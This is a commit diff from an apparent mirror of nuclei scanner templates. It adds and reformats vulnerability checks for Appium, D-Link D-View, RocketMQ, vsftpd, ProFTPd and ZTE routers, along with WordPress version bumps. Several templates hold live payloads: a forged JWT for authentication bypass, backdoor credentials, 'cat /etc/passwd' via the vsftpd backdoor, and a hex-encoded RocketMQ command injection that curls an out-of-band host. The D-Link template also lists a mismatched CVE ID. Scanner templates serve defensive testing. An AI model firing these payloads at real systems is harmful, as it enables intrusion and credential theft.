daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge remote-tracking branch 'origin' into impact-update

patch-1
sandeep 2023-09-27 22:48:05 +05:30
parent 1cd804ad8c 627e654d30
commit f12ba880af
101 changed files with 542 additions and 424 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
.new-additions
View File

@ -1,12 +1,15 @@
http/cves/2023/CVE-2023-2479.yaml
http/cves/2023/CVE-2023-2766.yaml
http/cves/2023/CVE-2023-36845.yaml
http/cves/2023/CVE-2023-42442.yaml
http/cves/2023/CVE-2023-4568.yaml
http/cves/2023/CVE-2023-5074.yaml
http/exposures/tokens/jotform/jotform-api-key.yaml
http/misconfiguration/installer/akeeba-installer.yaml
http/misconfiguration/installer/alma-installer.yaml
http/misconfiguration/installer/bitrix24-installer.yaml
http/misconfiguration/installer/gibbon-installer.yaml
http/misconfiguration/installer/klr300n-installer.yaml
http/misconfiguration/installer/mantisbt-installer.yaml
http/misconfiguration/installer/ojs-installer.yaml
http/misconfiguration/installer/zabbix-installer.yaml

3
cves.json
View File

@ -1915,6 +1915,7 @@
{"ID":"CVE-2023-24733","Info":{"Name":"PMB 7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB 7.4.6 contains a cross-site scripting vulnerability via the query parameter at /admin/convert/export_z3950_new.php. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24733.yaml"}
{"ID":"CVE-2023-24735","Info":{"Name":"PMB 7.4.6 - Open Redirect","Severity":"medium","Description":"PMB v7.4.6 contains an open redirect vulnerability via the component /opac_css/pmb.php. An attacker can redirect a user to an external domain via a crafted URL and thereby potentially obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24735.yaml"}
{"ID":"CVE-2023-24737","Info":{"Name":"PMB v7.4.6 - Cross-Site Scripting","Severity":"medium","Description":"PMB v7.4.6 allows an attacker to perform a reflected XSS on export_z3950.php via the 'query' parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-24737.yaml"}
{"ID":"CVE-2023-2479","Info":{"Name":"Appium Desktop Server - Remote Code Execution","Severity":"critical","Description":"OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-2479.yaml"}
{"ID":"CVE-2023-25135","Info":{"Name":"vBulletin \u003c= 5.6.9 - Pre-authentication Remote Code Execution","Severity":"critical","Description":"vBulletin before 5.6.9 PL1 allows an unauthenticated remote attacker to execute arbitrary code via a crafted HTTP request that triggers deserialization. This occurs because verify_serialized checks that a value is serialized by calling unserialize and then checking for errors.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25135.yaml"}
{"ID":"CVE-2023-25157","Info":{"Name":"GeoServer OGC Filter - SQL Injection","Severity":"critical","Description":"GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *preparedStatements* setting to mitigate the ``FeatureId`` misuse.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-25157.yaml"}
{"ID":"CVE-2023-25346","Info":{"Name":"ChurchCRM 4.5.3 - Cross-Site Scripting","Severity":"medium","Description":"A reflected cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the id parameter of /churchcrm/v2/family/not-found.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-25346.yaml"}
@ -2000,6 +2001,7 @@
{"ID":"CVE-2023-36289","Info":{"Name":"Webkul QloApps 1.6.0 - Cross-site Scripting","Severity":"medium","Description":"An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36289.yaml"}
{"ID":"CVE-2023-36346","Info":{"Name":"POS Codekop v2.0 - Cross Site Scripting","Severity":"medium","Description":"POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-36346.yaml"}
{"ID":"CVE-2023-36844","Info":{"Name":"Juniper Devices - Remote Code Execution","Severity":"medium","Description":"Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36844.yaml"}
{"ID":"CVE-2023-36845","Info":{"Name":"Juniper J-Web - Remote Code Execution","Severity":"medium","Description":"A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-36845.yaml"}
{"ID":"CVE-2023-36934","Info":{"Name":"MOVEit Transfer - SQL Injection","Severity":"critical","Description":"In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2023/CVE-2023-36934.yaml"}
{"ID":"CVE-2023-37265","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Internal IP","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37265.yaml"}
{"ID":"CVE-2023-37266","Info":{"Name":"CasaOS \u003c 0.4.4 - Authentication Bypass via Random JWT Token","Severity":"critical","Description":"CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-37266.yaml"}
@ -2030,6 +2032,7 @@
{"ID":"CVE-2023-4568","Info":{"Name":"PaperCut NG Unauthenticated XMLRPC Functionality","Severity":"medium","Description":"PaperCut NG allows for unauthenticated XMLRPC commands to be run by default. Versions 22.0.12 and below are confirmed to be affected, but later versions may also be affected due to lack of a vendor supplied patch.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2023/CVE-2023-4568.yaml"}
{"ID":"CVE-2023-4634","Info":{"Name":"Media Library Assistant \u003c 3.09 - Remote Code Execution/Local File Inclusion","Severity":"critical","Description":"A vulnerability in the Wordpress Media-Library-Assistant plugins in version \u003c 3.09 is vulnerable to a local file inclusion which leading to RCE on default Imagegick installation/configuration.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-4634.yaml"}
{"ID":"CVE-2023-4714","Info":{"Name":"PlayTube 3.0.1 - Information Disclosure","Severity":"high","Description":"A vulnerability was found in PlayTube 3.0.1 and classified as problematic. This issue affects some unknown processing of the component Redirect Handler. The manipulation leads to information disclosure. The attack may be initiated remotely.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2023/CVE-2023-4714.yaml"}
{"ID":"CVE-2023-5074","Info":{"Name":"D-Link D-View 8 v2.0.1.28 - Authentication Bypass","Severity":"critical","Description":"Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-5074.yaml"}
{"ID":"CVE-2001-1473","Info":{"Name":"Deprecated SSHv1 Protocol Detection","Severity":"high","Description":"SSHv1 is deprecated and has known cryptographic issues.","Classification":{"CVSSScore":"7.5"}},"file_path":"network/cves/2001/CVE-2001-1473.yaml"}
{"ID":"CVE-2011-2523","Info":{"Name":"VSFTPD 2.3.4 - Backdoor Command Execution","Severity":"critical","Description":"VSFTPD v2.3.4 had a serious backdoor vulnerability allowing attackers to execute arbitrary commands on the server with root-level access. The backdoor was triggered by a specific string of characters in a user login request, which allowed attackers to execute any command they wanted.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"network/cves/2011/CVE-2011-2523.yaml"}
{"ID":"CVE-2015-3306","Info":{"Name":"ProFTPd - Remote Code Execution","Severity":"critical","Description":"ProFTPD 1.3.5 contains a remote code execution vulnerability via the mod_copy module which allows remote attackers to read and write to arbitrary files via the site cpfr and site cpto commands.","Classification":{"CVSSScore":"10"}},"file_path":"network/cves/2015/CVE-2015-3306.yaml"}

2
cves.json-checksum.txt
View File

@ -1 +1 @@
39c60027acb5b66e6e4bb6ad252d317f
6746b8c9a4fa68a5263fab717bdaed2f

2
helpers/wordpress/plugins/admin-menu-editor.txt
View File

@ -1 +1 @@
1.11.1
1.11.2

2
helpers/wordpress/plugins/astra-sites.txt
View File

@ -1 +1 @@
3.4.2
3.4.3

2
helpers/wordpress/plugins/pixelyoursite.txt
View File

@ -1 +1 @@
9.4.5.1
9.4.6

2
helpers/wordpress/plugins/premium-addons-for-elementor.txt
View File

@ -1 +1 @@
4.10.9
4.10.10

2
helpers/wordpress/plugins/sg-cachepress.txt
View File

@ -1 +1 @@
7.4.1
7.4.2

2
helpers/wordpress/plugins/sg-security.txt
View File

@ -1 +1 @@
1.4.5
1.4.6

2
helpers/wordpress/plugins/woocommerce-payments.txt
View File

@ -1 +1 @@
6.5.0
6.5.1

2
helpers/wordpress/plugins/woocommerce-paypal-payments.txt
View File

@ -1 +1 @@
2.2.2
2.3.1

48
http/cves/2023/CVE-2023-2479.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2023-2479
info:
name: Appium Desktop Server - Remote Code Execution
author: zn9988
severity: critical
description: |
OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-2479
- https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/
remediation: Fixed in v1.22.3-4
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-2479
cwe-id: CWE-78
cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:*
epss-score: 0.0008
metadata:
max-request: 1
tags: cve,cve2023,appium,oast,rce
http:
- method: GET
path:
- '{{BaseURL}}/?url=<img/src="http://{{interactsh-url}}">'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource'
- type: word
part: header
words:
- 'application/json'
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: status
status:
- 404

44
http/cves/2023/CVE-2023-5074.yaml Normal file
View File

@ -0,0 +1,44 @@
id: CVE-2023-5074
info:
name: D-Link D-View 8 v2.0.1.28 - Authentication Bypass
author: DhiyaneshDK
severity: critical
description: |
Use of a static key to protect a JWT token used in user authentication can allow an for an authentication bypass in D-Link D-View 8 v2.0.1.28
remediation: |
Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.tenable.com/security/research/tra-2023-32
- https://nvd.nist.gov/vuln/detail/CVE-2023-5074
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-0563
cwe-id: CWE-798
epss-score: 0.00563
epss-percentile: 0.74832
cpe: cpe:2.3:a:dlink:d-view_8:2.0.1.28:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1317621215
fofa-query: icon_hash="-1317621215"
vendor: dlink
product: d-view_8
tags: cve,cve2023,d-link,auth-bypass
http:
- raw:
- |
GET /dview8/api/usersByLevel HTTP/1.1
Host: {{Hostname}}
Authorization: eyJhbGciOiAiSFMyNTYiLCJ0eXAiOiAiand0In0.eyJvcmdJZCI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODA5YWEiLCJ1c2VySWQiOiAiNTkxNzFkNTYtZTZiNC00Nzg5LTkwZmYtYTdhMjdmZDQ4NTQ4IiwidHlwZSI6IDMsImtleSI6ICIxMjM0NTY3OC0xMjM0LTEyMzQtMTIzNC0xMjM0NTY3ODkwYmIiLCJpYXQiOiAxNjg2NzY1MTk4LCJqdGkiOiAiZmRhOGU1YzNlNWY1MTQ5MDMzZThiM2FkNWI3ZDhjMjUiLCJuYmYiOiAxNjg2NzYxNTk4LCJleHAiOiAxODQ0NDQ1MTk4fQ.5swhQdiev4r8ZDNkJAFVkGfRTIaUQlwVue2AI18CrcI
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "userName") && contains(body, "passWord") && contains(body, "isEmailActivate")'
- 'contains(header, "application/json")'
condition: and

36
http/misconfiguration/installer/klr300n-installer.yaml Normal file
View File

@ -0,0 +1,36 @@
id: klr300n-install
info:
name: KLR 300N Router - Exposed Installation
author: andreluna
severity: high
description: |
Home router wireless KLR 300N setup page were Detected.
reference:
- http://www.keo.com.br/produtos/roteador-klr-300n
- http://www.keo.com.br/wp-content/uploads/2017/09/Manual_KLR_300N_03-17_site.pdf
metadata:
max-request: 1
verified: true
shodan-query: html:"def_wirelesspassword"
tags: keo,klr300n,misconfig,exposure,iot,install
http:
- method: GET
path:
- "{{BaseURL}}"
host-redirects: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Roteador Wireless KLR 300N</title>"
- "def_wirelesspassword"
- "Installation assitance"
condition: and
- type: status
status:
- 200

2
http/technologies/wordpress/plugins/sg-cachepress.yaml
View File

@ -1,7 +1,7 @@
id: wordpress-sg-cachepress
info:
name: SiteGround Optimizer Detection
name: Speed Optimizer The All-In-One WordPress Performance-Boosting Plugin Detection
author: ricardomaia
severity: info
reference:

2
http/technologies/wordpress/plugins/sg-security.yaml
View File

@ -1,7 +1,7 @@
id: wordpress-sg-security
info:
name: All-inclusive Security Solution by SiteGround Detection
name: Security Optimizer The All-In-One WordPress Protection Plugin Detection
author: ricardomaia
severity: info
reference:

9
network/backdoor/backdoored-zte.yaml
View File

@ -10,19 +10,18 @@ info:
- https://www.exploit-db.com/ghdb/7179
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cvss-score: 10
cwe-id: CWE-912
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: http.html:"ZTE Corporation"
verified: true
tags: edb,network,zte,telnet,backdoor,router
tcp:
- host:
- "{{Hostname}}"
- "{{Host}}:23"
port: 23
inputs:
- data: "root\r\n"
- data: "Zte521\r\n\r\n"

11
network/backdoor/vsftpd-backdoor.yaml
View File

@ -7,23 +7,22 @@ info:
description: VSFTPD 2.3.4 contains a backdoor command execution vulnerability.
reference:
- https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/
remediation: This backdoor was removed on July 3rd, 2011.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10.0
cvss-score: 10
cwe-id: CWE-78
remediation: This backdoor was removed on July 3rd, 2011.
tags: network,vsftpd,ftp,backdoor
metadata:
max-request: 2
max-request: 1
tags: network,vsftpd,ftp,backdoor
tcp:
- inputs:
- data: "USER anonymous\r\nPASS anonymous\r\n"
host:
- "{{Host}}:21"
- "{{Hostname}}"
port: 21
matchers:
- type: word
words:

10
network/cves/2001/CVE-2001-1473.yaml
View File

@ -5,28 +5,28 @@ info:
author: iamthefrogy
severity: high
description: SSHv1 is deprecated and has known cryptographic issues.
remediation: Upgrade to SSH 2.4 or later.
reference:
- https://www.kb.cert.org/vuls/id/684820
- https://nvd.nist.gov/vuln/detail/CVE-2001-1473
- http://www.kb.cert.org/vuls/id/684820
- https://exchange.xforce.ibmcloud.com/vulnerabilities/6603
remediation: Upgrade to SSH 2.4 or later.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
cvss-score: 7.5
cve-id: CVE-2001-1473
cwe-id: CWE-310
epss-score: 0.00258
cpe: cpe:2.3:a:ssh:ssh:1.2.24:*:*:*:*:*:*:*
epss-score: 0.00258
metadata:
max-request: 2
vendor: ssh
max-request: 1
product: ssh
vendor: ssh
tags: cve,cve2001,network,ssh,openssh
tcp:
- host:
- "{{Hostname}}"
- "{{Host}}:22"
port: 22
matchers:
- type: word
words:

3
network/cves/2011/CVE-2011-2523.yaml
View File

@ -34,7 +34,8 @@ variables:
cmd: "cat /etc/passwd" # shows the the user and group names and numeric IDs
tcp:
- host:
- "{{Host}}:21"
- "{{Hostname}}"
port: 21
inputs:
- data: "USER letmein:)\r\nPASS please\r\n"
read: 100

9
network/cves/2015/CVE-2015-3306.yaml
View File

@ -14,22 +14,23 @@ info:
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157053.html
- http://lists.fedoraproject.org/pipermail/package-announce/2015-May/157054.html
- https://nvd.nist.gov/vuln/detail/CVE-2015-3306
remediation: Upgrade to ProFTPD 1.3.5a / 1.3.6rc1 or later.
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
cvss-score: 10
cve-id: CVE-2015-3306
cwe-id: CWE-284
epss-score: 0.97267
cpe: cpe:2.3:a:proftpd:proftpd:1.3.5:*:*:*:*:*:*:*
epss-score: 0.97267
metadata:
max-request: 2
vendor: proftpd
max-request: 1
product: proftpd
vendor: proftpd
tags: cve,cve2015,ftp,rce,network,proftpd,edb
tcp:
- host:
- "{{Hostname}}"
- "{{Host}}:21"
port: 21
inputs:
- data: "site cpfr /proc/self/cmdline\r\n"
read: 1024

14
network/cves/2023/CVE-2023-33246.yaml
View File

@ -15,20 +15,21 @@ info:
- http://packetstormsecurity.com/files/173339/Apache-RocketMQ-5.1.0-Arbitrary-Code-Injection.html
- http://www.openwall.com/lists/oss-security/2023/07/12/1
- https://lists.apache.org/thread/1s8j2c8kogthtpv3060yddk03zq0pxyp
remediation: Update the RocketMQ application to version 5.1.1
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-33246
cwe-id: CWE-94
epss-score: 0.95581
cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:*
epss-score: 0.95581
metadata:
verified: true
max-request: 2
vendor: apache
fofa-query: protocol="rocketmq"
max-request: 1
product: rocketmq
shodan-query: title:"RocketMQ"
fofa-query: protocol="rocketmq"
vendor: apache
verified: true
tags: cve,cve2023,rocketmq,rce,oast,intrusive,network
variables:
part_a: '{{ hex_decode ("000000d2000000607b22636f6465223a32352c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3339357d66696c7465725365727665724e756d733d310a726f636b65746d71486f6d653d2d632024407c7368202e206563686f206375726c20") }}'
@ -36,7 +37,8 @@ variables:
tcp:
- host:
- "{{Hostname}}"
- "{{Host}}:10911"
port: 10911
inputs:
- data: '{{ part_a + "{{interactsh-url}}" + "/////////////" + part_b }}'
read: 1024

10
network/default-login/ftp-anonymous-login.yaml
View File

@ -4,13 +4,13 @@ info:
name: FTP Anonymous Login
author: C3l3si4n,pussycat0x
severity: medium
reference:
- https://tools.ietf.org/html/rfc2577
description: |
Anonymous FTP access allows anyone to access your public_ftp folder, allowing unidentified visitors to download (and possibly upload) files on your website. Anonymous FTP creates the potential for a security hole for hackers and is not recommended.
tags: network,ftp,default-login
reference:
- https://tools.ietf.org/html/rfc2577
metadata:
max-request: 2
max-request: 1
tags: network,ftp,default-login
tcp:
- inputs:
@ -20,8 +20,8 @@ tcp:
read: 1024
host:
- "{{Host}}:21"
- "{{Hostname}}"
port: 21
matchers-condition: and
matchers:

8
network/default-login/ftp-weak-credentials.yaml
View File

@ -8,11 +8,11 @@ info:
reference:
- https://docs.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/ftpserver/security/authentication/
classification:
cvss-score: 8.5
cvss-metrics: 3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N
tags: network,ftp,default-login,service
cvss-score: 8.5
metadata:
max-request: 2
max-request: 1
tags: network,ftp,default-login,service
tcp:
@ -21,7 +21,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:21"
port: 21
attack: clusterbomb
payloads:

6
network/default-login/ldap-anonymous-login.yaml
View File

@ -13,9 +13,9 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cwe-id: CWE-284
tags: network,ldap,default-login,tenable
metadata:
max-request: 2
max-request: 1
tags: network,ldap,default-login,tenable
tcp:
- inputs:
@ -24,7 +24,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:389"
port: 389
read-size: 1024
matchers:

6
network/detection/activemq-openwire-transport-detect.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
OpenWire is the native protocol that Apache ActiveMQ uses. It is designed for performance and size on the wire - sacrificing some ease of implementation with higher performance and reduced network bandwidth as a priority.
metadata:
max-request: 2
max-request: 1
shodan-query: product:"ActiveMQ OpenWire transport"
verified: true
shodan-query: 'product:"ActiveMQ OpenWire transport"'
tags: network,activemq,detect
tcp:
@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:61616"
port: 61616
matchers-condition: and
matchers:

6
network/detection/apache-activemq-detect.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides "Enterprise Features" which in this case means fostering the communication from more than one client or server.
metadata:
max-request: 2
max-request: 1
shodan-query: product:"Apache ActiveMQ"
verified: true
shodan-query: 'product:"Apache ActiveMQ"'
tags: network,activemq,oss,detect
tcp:
@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:61613"
port: 61613
matchers-condition: and
matchers:

6
network/detection/axigen-mail-server-detect.yaml
View File

@ -7,10 +7,10 @@ info:
description: |
Axigen Mail Server was detected.
metadata:
max-request: 2
verified: true
fofa-query: app="axigen-Mail-Server"
max-request: 1
shodan-query: product:"Axigen"
verified: true
tags: network,axigen,detect
tcp:
@ -19,7 +19,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:25"
port: 25
matchers:
- type: word

6
network/detection/cisco-finger-detect.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79.
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: product:"Cisco fingerd"
verified: true
tags: network,finger,detect
tcp:
@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:79"
port: 79
matchers:
- type: word

6
network/detection/clamav-detect.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
Clam AntiVirus is a free software, cross-platform antimalware toolkit able to detect many types of malware, including viruses.
metadata:
max-request: 2
max-request: 1
shodan-query: port:3310 product:"ClamAV"
verified: true
shodan-query: 'port:3310 product:"ClamAV"'
tags: network,clamav,detect
tcp:
@ -17,7 +17,7 @@ tcp:
- data: "VERSION"
host:
- "{{Hostname}}"
- "{{Host}}:3310"
port: 3310
matchers:
- type: regex

6
network/detection/cql-native-transport.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
Native transport requests (NTR) are any requests made via the CQL Native Protocol. CQL Native Protocol is the way the Cassandra driver communicates with the server.
metadata:
max-request: 2
max-request: 1
shodan-query: cassandra
verified: true
shodan-query: "cassandra"
tags: network,cassandra,cql,detect
tcp:
@ -25,7 +25,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:9042"
port: 9042
matchers:
- type: word

7
network/detection/detect-addpac-voip-gateway.yaml
View File

@ -10,11 +10,10 @@ info:
- http://www.addpac.com/addpac_eng2/down.php?file=505_f16.pdf
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: network,addpac,apos,voip,detect
metadata:
max-request: 2
max-request: 1
tags: network,addpac,apos,voip,detect
tcp:
- inputs:
@ -23,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:23"
port: 23
matchers:
- type: word

7
network/detection/detect-jabber-xmpp.yaml
View File

@ -9,11 +9,10 @@ info:
- https://datatracker.ietf.org/doc/html/rfc6120
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
tags: network,jabber,xmpp,messaging,detect
metadata:
max-request: 2
max-request: 1
tags: network,jabber,xmpp,messaging,detect
tcp:
- inputs:
@ -21,7 +20,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:5222"
port: 5222
matchers:
- type: word

7
network/detection/dotnet-remoting-service-detect.yaml
View File

@ -8,12 +8,11 @@ info:
Microsoft .NET Remoting httpd was detected.
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: product:"MS .NET Remoting httpd"
verified: true
tags: network,detect,microsoft
tcp:
@ -22,7 +21,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:8080"
port: 8080
matchers-condition: and
matchers:

10
network/detection/dropbear-cbc-ciphers.yaml
View File

@ -6,14 +6,14 @@ info:
severity: low
description: |
The SSH server is configured to support Cipher Block Chaining (CBC) encryption. This may allow an attacker to recover the plaintext message from the ciphertext.
remediation: |
Disable CBC Ciphers.
reference: |
https://www.tenable.com/plugins/nessus/70658
remediation: |
Disable CBC Ciphers.
metadata:
max-request: 2
max-request: 1
shodan-query: product:"Dropbear sshd"
verified: true
shodan-query: 'product:"Dropbear sshd"'
tags: network,ssh,dropbear,detect
tcp:
@ -22,7 +22,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:22"
port: 22
matchers:
- type: word

7
network/detection/esmtp-detect.yaml
View File

@ -10,12 +10,11 @@ info:
- https://nmap.org/nsedoc/scripts/smtp-open-relay.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0.0
cwe-id: CWE-200
metadata:
max-request: 2
max-request: 1
shodan-query: ESMTP
verified: true
shodan-query: 'ESMTP'
tags: network,detect,smtp,mail
tcp:
@ -24,7 +23,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:25"
port: 25
matchers-condition: and
matchers:

6
network/detection/expn-mail-detect.yaml
View File

@ -6,9 +6,9 @@ info:
severity: info
description: |
The "EXPN" can be used by attackers to learn about valid usernames on the target system. On some SMTP servers, EXPN can be used to show the subscribers of a mailing list subscription lists are generally considered to be sensitive information.
tags: mail,expn,network,detect
metadata:
max-request: 2
max-request: 1
tags: mail,expn,network,detect
tcp:
- inputs:
@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:25"
port: 25
matchers:
- type: word

6
network/detection/finger-detect.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
The finger daemon runs on TCP port 79. The client will (in the case of remote hosts) open a connection to port 79.
metadata:
max-request: 2
verified: true
max-request: 1
shodan-query: port:"79" action
verified: true
tags: network,finger,detect
tcp:
@ -18,7 +18,7 @@ tcp:
host:
- "{{Hostname}}"
- "{{Host}}:79"
port: 79
matchers:
- type: word

7
network/detection/gnu-inetutils-ftpd-detect.yaml
View File

@ -7,9 +7,9 @@ info:
description: |
The File Transfer Protocol (FTP) is a standard network protocol used to transfer computer files between a client and server on a computer network.
metadata:
max-request: 2
max-request: 1
shodan-query: product:"GNU Inetutils FTPd"
verified: true
shodan-query: 'product:"GNU Inetutils FTPd"'
